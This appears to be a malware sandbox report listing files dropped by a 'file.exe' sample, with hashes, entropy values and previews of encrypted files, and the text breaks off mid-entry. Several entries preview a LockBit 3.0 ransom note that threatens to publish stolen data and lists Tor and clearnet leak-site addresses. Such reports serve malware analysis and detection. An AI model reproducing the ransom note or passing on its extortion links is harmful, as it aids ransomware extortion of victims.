                SHA-256:198BF66C3059C2DFFE6E1B75DBF8FF2CDC62C3218FD04855CB596380CB6607F0
                SHA-512:2389BAB3E27422B29899D6B3700CC0F7EACF282EC7804534C50360415CDB42C1922D1D981A0F05C66A62FD165B11C95A40772ABFDEAF78FFA328226BA5AE8956
                Malicious:true
                Preview:..B...E..i<c4+.1O>.P....;.........Z.....k.T..^^..5..,s...E.{..p....=,P....3.{ .=.....Ag....q09F..=..&...7.\"S.5tf6..rlq..*>.Eu.b.ss.cv..ib..E+.[.u....U...A.....WOZh..|.,...rV8...P..U&.\......|..j.D&B..b.K...`.x...G1.._G...f...[.mU.t=?.....>..(..a*.F...............#kQ......9.nVq0....R...>..Ip...N#tJ.".38.0^.....*.q. ..T....M.|&..TB}....J..e.j...~.$.F.C.3.....{...y.]%Ew.Y......g.a._. ...D.Eq..$.Y..K(.....U.=.....1.z.v.t.h...4..>...l..s.+...Z.n....g..&.)..*.7Gy9...P......e/......vP...B....L.PH730l..v....\.z(....Q1r...2a.?.j...r]t.U}.yQ/z...S..H.<..(\....N.^.....D_A...V64.P.?....-.p&......!.*.......Ck...B.Nzds..dJ.y.E.l..xB.....M;%......r.b]..6.s A..^.Z./X]..-./F..W...}..i...I.G...s...-y..%;..0.BJ..G.d2".9..~....7$..5.:../.."..+..Hs9r..\.R.-..X-..M9....K.........].m.m......b.#.J.._.5\..HS1?.Ne...A+..:@emX.....v...<...h.....A.<.]...LC9.76..d..a?a...z.......e...4 .....t..D9...>W0].(8%.|5...3+.z..S..6.r..f..%.3.JvC.......9/K.j.d.|b5nY..M=

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96385bb4-2787-4948-bd9e-8eb130827bf5}\0.1.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):264
                Entropy (8bit):7.218964562546956
                Encrypted:false
                SSDEEP:6:caKUoF9YCKXq3/lWQTtQaBw0mW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:caKDOUAWtPG0D2VJNAWnM+i+9BVzd
                MD5:31C2B97ECDE6554AD3F5E1013084E113
                SHA1:FCC79013C3BF037B58F23E0BAB7C4ED03C804862
                SHA-256:04F8C21F42FA26E801CC534A642FBC0306442061735FA956A67D89364D6D0DB5
                SHA-512:F2CE2A8D39F8E3C9BD5D7C988E9C1C8C89B4C0404FD4C9D40DC44CF17EBC8A6B6FF007F5AD2D07FA17C2EE50C1A727CD88423099034329DFE04CE33834D85025
                Malicious:false
                Preview:......^q.!..W,.#....%...q.(.viU}.GJbp.d.>..K.C.h.=L..2?.|@/..Ik"a;...i.(..b..+.K...<.G.oM.,.R.}.4j{.w..p.".q..H..;........g..}..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96385bb4-2787-4948-bd9e-8eb130827bf5}\0.2.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):264
                Entropy (8bit):7.212621486635188
                Encrypted:false
                SSDEEP:6:kg9YCKXq3AvnLFqmW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:kgOUKnED2VJNAWnM+i+9BVzd
                MD5:D73C060844E48CD7546ED867580BC472
                SHA1:C5CF7EC79E3B8F1EDFCB93667B835BFFCB3F7D34
                SHA-256:237F08D30BFD3BF872D0C204B48EE4A7E25706A4F3B97CB447AA6F5620C56113
                SHA-512:73D9BC10B54C4A8E5CDB2287BB5D602CAC77F0158762BC479901F1588763DF7B2D32B48778DC28FB34B1C628F940A7A77BB66816DC8BCF3E86FEE070EC3537C9
                Malicious:false
                Preview:...t..^q."..W,.#....%...q.(.viU}.GJbp.d.>..K.C.h.=L..2?.|@/..Ik".K..p.....eE.V\VE..3.l.Wfyu-.3...S.@aEy..K..:...Ha,&.... n....}..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96385bb4-2787-4948-bd9e-8eb130827bf5}\Apps.ft.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):27386
                Entropy (8bit):7.99292087267696
                Encrypted:true
                SSDEEP:768:hmHXKEwSWvKKrPS9mbtpGAdn1s92x7ADn+JGY6HaAt0e:hmaEw7q2GAdnmsUaqHaA2e
                MD5:1C4067AF5C87742D2CD6675F0CF1F3EF
                SHA1:3463A43772492EA1B5C87D8FFC30442410247E20
                SHA-256:97F33DD07B1CE7EB034BE44E1628F27E8EA42488E64C1C6FFC5D520F354532D2
                SHA-512:BB82BE6758B3E612801DDC4CF3B90612BE9AF1F839B38F857A469604E4A8846BA17930B070CC1C1DC37E536D1A1768375247EEC0569DABD9F01E2E76776DA15D
                Malicious:true
                Preview:..wN.r..d\.5>.*.......6.5..P......@T.S*....1..W.<.Ob...z......-..S...;.jM.....C...<..........M...{..IHJ...@..,....V.RS...O...u.v....>6...D...=`*#..]9-.....u.g.U5..........t%.,..v.A.r..BU.....B...8$q...~M.p......wh..LMA.........wG...i.7.o.\.../pW.....HiAq.;.......[f...y.....=F.{..6..A.B@.{NI...4c..M............7..h.R.F......d...d...?m.3...P.......'..tN....G..F....:...\....r.........2.e..U.O.b.0B.....B...e].V..lJ#.....4....G.2........5...$....d..C0.p..`..>....H..z...>xnv.$\e..k.H:...O.Q...4......6...8.)...mn..n..*........j......?b..awQ.&Hdd....YH-.R+..I7.I..9.........\...Jd..2h.TX*sV.l.@......|..K../.T}@.W.....Aq...TJ.^.@/.........|X..+....d...7R.H6T.\...R..Rd:%.m.\....|br..c...eP..\..+.M8.U....o....hq...S...#.....,.......:.G{ih....B.)..."-....w.#..-Z.}m.=.#.1.=iAL.^pZ......C&..cn:..G}.O.......2`...0....S..o...}zE\.[.D.I1...|vT+{.;..G~'...9...UK..*.F5..a..T. C.KX... ....3.|}z.Bu.i~..C.......<...tNJ..`|..O.a..^EA...q....,..(..[}%..Pl.^

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96385bb4-2787-4948-bd9e-8eb130827bf5}\Apps.index.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):146149
                Entropy (8bit):7.998965795525579
                Encrypted:true
                SSDEEP:3072:FOsvsQBy5je4oNuljr42gruxbHYvX74HmCHdb0Vtl/7I+ql5g4X3U:FdTIA4oNul3zHY/74HnHOVjIhg40
                MD5:D39F6F4DE6578A1C7202213CDF76A9BF
                SHA1:4C8E90001D04941FD2588E5FA036A33A385E9D27
                SHA-256:CD29598E08B299BEC6C77B503C671A562AB1E3087563F89A8DE869E49A14DC0E
                SHA-512:AA3749291562111926E488F94F5A9FE15C96307F82DF2F3BEB5CFA79776282191AF199A6A9DE521C97BFDC2958C4D6C009DE8687CF8F86C3792395218824B3B9
                Malicious:true
                Preview:x..Y..i.{.....(2.E..t..n......6..F.8xk'N......V.H. .<m....j.w.........E...IN.IM|..."..U.$..!......*............sU.!...),{....R.?e.d..Q....#}..j.......j.k.nH..^+V...".....k.TFl(.S>.t....?.8:m..5^.#.....0&..N.....u,..k.u..4R..k8.?......7..H..}............|.s8...^......{..g.y.Nm...$_.T..+..T..|......."<h.*..k........x...nfA.....v.z.D*@...%.3.l<...f...f.....i......'Q.....*.?...M....}..I9.o..R!.Y&).G&..d1...nj.>...x~P.`z.`...y.b|..;...`d...."i.~&.2.........t..u.o..>..b.......v...L..o`..U..@>...j/O.}..R..^m.6.E&..m...]Mh...a.hN.4@..-...|.:.;o.+p-..?..7IV....9...g....Sw@.,.......#S..@..x:f5|.....!....6.).Olhfk.>J.jLd.<..i9 ..,..B...pE.l3.~z.6..?k...t...>...ao.^.Z.CP..Q..N}.{~...abTLN...B...{.%.2i.?.Gr.J(.......tVW9.P...d.H..7K.....{..<B..&.B.wd.X....;Yc@..<*D.#...?I*h...n.z.M.Go..5....d...B._j....AK....G..;.{Oi..r.2....(...L..}.....(.kCZ}..be..S.C..h.....1.|..D.i....w{.4.8.o'GZ..(BhB.!....w.. .kj...G/.0..D...Z."C...............Y..?.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{96385bb4-2787-4948-bd9e-8eb130827bf5}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f7d1f2ce-1638-48ce-a40d-6b3a92a12dce}\0.0.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):20515
                Entropy (8bit):7.991485190976863
                Encrypted:true
                SSDEEP:384:7hhYb6NpviWtVzvygnhriFSzM3/1uylptyjVZrnUOqOEGNuDE:PPNpviycEgFSzM3/MgtgVdnUOqOEXE
                MD5:64B0C5C3EE2D5E18FCE6AB871A49EC84
                SHA1:0607F675752133B9B6676678916324AD547164FE
                SHA-256:E7F4F875B8C58A730B2248C39A486BEA7EE4BC1EB3778C6CF6B668FA048720BA
                SHA-512:47D90856B754FBC647BA7F25FFF3FDD5D235D4C8F2B17A47A06BA802BDF3B33F607D7C21008596DD53D4DEE6D19B754E6D2DFC4D5AA25D4A58EDD94E8691FA6E
                Malicious:true
                Preview:.....~..K...Q...6*..7w.....o&5o,.,~2G.EU.H..s.i....7..-../gv^.{..........C.......>.......(....C.<.........r.B*.y.?.$2..G.X.T..%.!.....q....C.C....P..U.\=x...[yh...._.....<.......;.ea+(...$={... ...h..b?.n.#@.....C....B..*...9w..7+.........j....9g.]....^.....N.3.......E.a..mN......f;o......>.1.....BW..*oc...q.'..RN.%.].H....Jgk`.......-I.8...pj:.).6.Z.].f..x...C.....a.^E.n....,Pq.s..-r.......b...#..K..3.........F...8.k....B......FR.....z.T..C.k8Cw.W.,0p...zO.70vq.N.0.Z..L....qW<.d.*.....................].p.*g..&..N..Y........2...R2....!.o.=..z"w]:......&.c-..p.....*.!'..:..eS..(#....8'.8pG..>.n...g3.))..z.5m.....&.j..k..>.Ro.%.=..s...].~...YK.VO.p.BV"..MI.......^N.7.r.k.).......)oM.p...#....%....@..]..56b.p.iz.`..!....|. .J.|`.zi..^.F....5..{f\Hz....[$).......R.yO...f......QcT..T.......t.#...bd.......gIf..Z.....,..!lRq|w.nK..{...j\IL>..t:....A{~{..W[.g..(...\......=.....".l.`.m.V'...|?..e..[<........[9w:..."{./'p.K.A.h.!....lh_.."

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f7d1f2ce-1638-48ce-a40d-6b3a92a12dce}\0.1.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):264
                Entropy (8bit):7.188135147821894
                Encrypted:false
                SSDEEP:6:l3dF9YCKXq3KlOwrMJImW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:tTOUKgZID2VJNAWnM+i+9BVzd
                MD5:0E0166448EC9C586CD6E6128A9B45560
                SHA1:D2C28F8B54DEDFACF1A04CA9D641058FDD71E772
                SHA-256:8FA84B56CDCEF534E5A4C90FBAD05CA6A04205D1C13C8BD270CF374C8DE93B21
                SHA-512:A54CD9A210BB592B4E162F8F1105F600734679BA072E35615BAB7E3884D5EDA9BF2857ABFB9AD65AE368618C08224D8BF832FA557DF38EEA9C1615DF9D43ACB1
                Malicious:false
                Preview:..\N..^q.!..W,.#....%...q.(.viU}.GJbp.d.>..K.C.h.=L..2?.|@/..Ik"_.......^.0...(D.1?.HM06...,k.t.},^.|.q^..9...$.1...S.mx.MG..}..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f7d1f2ce-1638-48ce-a40d-6b3a92a12dce}\0.2.filtertrie.intermediate.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):264
                Entropy (8bit):7.203286662973409
                Encrypted:false
                SSDEEP:6:CuWXg9YCKXq3n1Xbq4xohChOHnimW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:t2gOUndm4xohPniD2VJNAWnM+i+9BVzd
                MD5:805F5433E61244A0840A7B37961160E6
                SHA1:861EFF617D9F12CF258F748B390EE7B761D0C7C7
                SHA-256:0725C5238E1656CBF228A9E4A0D279488C017C0D5E693B1FAC4195C9D3126AF3
                SHA-512:5AD27C3E23AF4AB92DD4A7330E0A8789E6564F01E853EAE29D44E596A77FE0465FBEA93F3D646A681C7DFB84649DC469D165CFD2FC1B380A49A3BDD6ADD3F1F6
                Malicious:false
                Preview:.n...^q."..W,.#....%...q.(.viU}.GJbp.d.>..K.C.h.=L..2?.|@/..Ik"...[..a....Y......+.XS.M....r.2Z...7.G{V[H......kg.F.B.p}..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f7d1f2ce-1638-48ce-a40d-6b3a92a12dce}\Apps.ft.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):27386
                Entropy (8bit):7.992629970992949
                Encrypted:true
                SSDEEP:768:Nne8kDvInEiPZF53HDKGvFbH9oI/LUe2eeOMZjO:clDgD3Dtdb6IDwZC
                MD5:0CBE09B8786BBD870689D589A900C01F
                SHA1:13FF4780973804E4EBE33E64F8726814745B643D
                SHA-256:BF7EE6A695D1B33E4555DA99489CEE39657DEB86D7BE8BDA8C73E3733D683054
                SHA-512:3D1615A6AAA89FAF2CBBC14B152FF6C1F82ED8AE8D3BE41917B28F4456BC111206064A482A5020DF1752A99D5F949E56AE5287F0DD04CE30DA99D32810C85296
                Malicious:true
                Preview:...86.4~....0n..3U *.Sc3gAj..Rkv.4.F(.....Z...%.....o.).V....}..m..z+@9.Z.d.D..........c.".Z...i.....K.B.>.\3...,.;....._S.?..H_..,R. .u.|.......s..=...0. ..r`....v...NS0....<.-..$r.ohb.)...On..K..N..8(.....tA..IT0.-...$a.p.".[..6I.1S....:....9..:..S`.}-..G&....]...fF....2a[.T..u.F}........'..g..-.V.ty....@VuY./H..+HIVo..1U....;;.`....%O..G...c...I(.2P...$..-.J.vs........7O.x..TO,..:...@(.?.,...(..QCQF1."b...a.*....5x2.pK..<|.}.=0..W^....2...0<...R-.=.....6/.Ak....cx..."...F.!....8.._'...|..<m^d...7.oR......F.8.<../...\...c.+`Q...|..X....<. t.}.`Yd:+.g........"14/.C....O.!......w4..P$..\l.E...w.Gj....F#....;n....mh^...s/..._jL.....g.QpH6.X!&....u.lU^...D...R{..P..bO....B.....5r..$p.......\.>@G....D.l#.".t...-....$.)y....>.q..).....M......U......9.w.M.L...^.."..\...O.....&....`/...:~.....k,..f...`B..s...H6.W..j.V".}h........&E.........\'.....N.....u~a.18~4X.V..R/..... ;.%q;.%p.......w+KF5FI(-C.c]._-...(97%..KO`".t\9....].k.........P7.....

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f7d1f2ce-1638-48ce-a40d-6b3a92a12dce}\Apps.index.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):145841
                Entropy (8bit):7.99861443305508
                Encrypted:true
                SSDEEP:1536:I6VhXddf4A66gfOiFIgPQo+Xb8/rFUI4KReWbvhNnlHlmZ63XuqIsM4CDrGprGYD:jn4Zum1ub8/rG5AzhNTpIsdAYrGYuM8o
                MD5:5D7C0FBDD00FA7E84C9E9B59EF6D568C
                SHA1:42668F69590303B87A1AEF9ACE532B1BD7AEDE69
                SHA-256:2C2CFE08BA3D2008532437EE068F42E912EEB9DB42A4FC6C484E29E358B73E93
                SHA-512:FA560790551B404F511F2DE28D9F198D946934B47D461BAD2161D3548CDE4493061644AC63C0B6A7FF05744A857DAC17AE17C20929F550FCC6E6E30FCC55D5F0
                Malicious:true
                Preview:..Z.Y0WF\!U.s..?.Yd*s..-.8*...d..........K./...[.-..a...x.?g..\.e.) 0..0..R..)...i7.SOq..... */+..hE.v.,....!N...........#9.....N.... ......3......Nl....$5.Q7z..~....D...E....V...3/..LHc......O|.).m.J.Q..3..."...a......=..$.S>."Uu^:..(.i:..?\...*C;..y..v..[.*....;...)rG..6....kH.1.e`.UMJ...An.A*.c..30E-......N. .u.}..f...C...Uq..s.. ...T...>.\v.-..P.T.f..X..[.2~D.3f][.....%..\-1..&.5.....d....K)t<../.(....N%..`d.|J....2./.6a../*ZL.....m......T.S...A..1..$."..`...)...?.#T.eH....p...r#\.....#.3.......[Z......y.D.......[....h.u>g..2i..^f.i.&...92.....J+Q:v..R...kvO.Z'..G~eI7.U.....y.C..x...a...G9..N{.....B2.Cn...Dz[k'?..,Z.A....Y.j4.i.m...m%..HT~..>@Yr...{1!#OwV .5...M..v.g.@98..{.ed.).1J....>@o.+..-.C..<*...F.o.R'.fi...4.....L..#...4...m..jp"L.[..........H..U.....D~....k.....8.YO.....f..u...b...tF....jnb.[Fx.5...m3.%.=.}_..(FNqS.$...d=....ft...4..m....'...O.........m.....1......<....QE.....sL.\i.. .$~.D^1.i)./?...iI..9.4v..S.L.q2W.j.x.V.-

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f7d1f2ce-1638-48ce-a40d-6b3a92a12dce}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0b11cf8d-da45-4b36-ad74-5b178b112358}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{21a92316-54d2-4b2e-bdf7-3d2e07db3b14}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{42e69a5f-f50b-4ab8-9366-0d7ecd1c46bc}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{6bd640a4-a5f3-4bd9-9f66-5a758203d37e}\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
